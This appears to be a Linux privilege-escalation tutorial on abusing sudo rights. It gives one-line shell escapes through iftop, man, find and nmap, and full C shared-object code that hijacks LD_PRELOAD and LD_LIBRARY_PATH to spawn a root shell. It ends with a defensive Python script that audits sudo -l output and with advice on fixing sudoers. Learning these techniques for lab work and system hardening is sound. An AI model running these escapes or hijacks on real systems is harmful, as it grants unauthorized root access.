Sudo is one of the first things I check during priv esc on Linux. Running sudo -l shows all commands that the current user can run with sudo.

Most of these can be abused very easily using one-liners from https://gtfobins.github.io/
I'll run a few examples of these before moving on to env_keep variables.
We can run sudo iftop, then type ! to open a command prompt, followed by /bin/bash to spawn a shell.


The same method can be used for man.


sudo find . -exec "/bin/bash" \; -quit is another very easy example.

Nmap can be used to execute scripts as root if given sudo permissions.

As LD_PRELOAD is kept in the environment (env_keep) in this instance, we can abuse this to create a shared object that is loaded before the binary we run through sudo. For this we can use the following C code:
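#define _GNU_SOURCE   /* needed for the setresuid() declaration */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init() runs as soon as the shared object is loaded */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep child processes from preloading this object again */
    setresuid(0,0,0);         /* set real, effective and saved UID to root */
    system("/bin/bash -p");
}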
Compile the C code into a shared object using gcc and run sudo LD_PRELOAD=<compiled binary> <sudo binary>

It is also possible to abuse the LD_LIBRARY_PATH variable. First we use ldd to check which libraries are loaded by the binary we want to abuse. Then we compile the following C code into a shared object with the same name as one of those libraries.
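#define _GNU_SOURCE   /* needed for the setresuid() declaration */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* constructor attribute: hijack() runs when the library is loaded */
static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");   /* child processes go back to the normal library search path */
    setresuid(0,0,0);              /* set real, effective and saved UID to root */
    system("/bin/bash -p");
}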

Once the C code is compiled we can run sudo LD_LIBRARY_PATH=<directory for compiled binary> <sudo binary>
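
From the defender's side, the same sudo -l output can be audited for everything used in this post. The following is an added example, not code from the original post: the function name audit_sudo_l and the sample listing are constructed for illustration, and it additionally flags an unrestricted ALL rule.

```python
import re

# Binaries this post escapes from when they are allowed via sudo.
SHELL_ESCAPE_BINARIES = {"iftop", "man", "find", "nmap"}
# Dynamic-loader variables this post abuses when sudo preserves them.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

# Constructed sample of `sudo -l` output (not captured from a real host).
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+="LD_LIBRARY_PATH LANG"

User user may run the following commands on host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/apt-get update
    (ALL : ALL) ALL
"""

def audit_sudo_l(text):
    """Return sorted (kind, detail) findings for one `sudo -l` listing."""
    findings = set()
    # Matches env_keep=VAR, env_keep+=VAR and env_keep+="VAR1 VAR2".
    for value in re.findall(r'env_keep\+?=("[^"]*"|[^,\s]+)', text):
        for var in value.strip('"').split():
            if var in LOADER_VARS:
                findings.add(("env_keep", var))
    # Rule lines look like: (runas) [TAG:] /path/cmd args, /path/cmd2
    for line in text.splitlines():
        m = re.match(r'\s+\(([^)]*)\)\s*(.*)', line)
        if not m:
            continue
        spec = re.sub(r'\b[A-Z_]+:\s*', '', m.group(2))  # drop NOPASSWD: etc.
        for cmd in spec.split(','):
            parts = cmd.split()
            if not parts:
                continue
            if parts[0] == "ALL":
                findings.add(("command", "ALL"))
            elif parts[0].rsplit('/', 1)[-1] in SHELL_ESCAPE_BINARIES:
                findings.add(("command", parts[0]))
    return sorted(findings)

if __name__ == "__main__":
    for kind, detail in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{kind}: {detail}")
```

Any env_keep finding is fixed by removing that variable from env_keep in sudoers; command findings call for dropping the rule or replacing it with a narrowly scoped wrapper.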
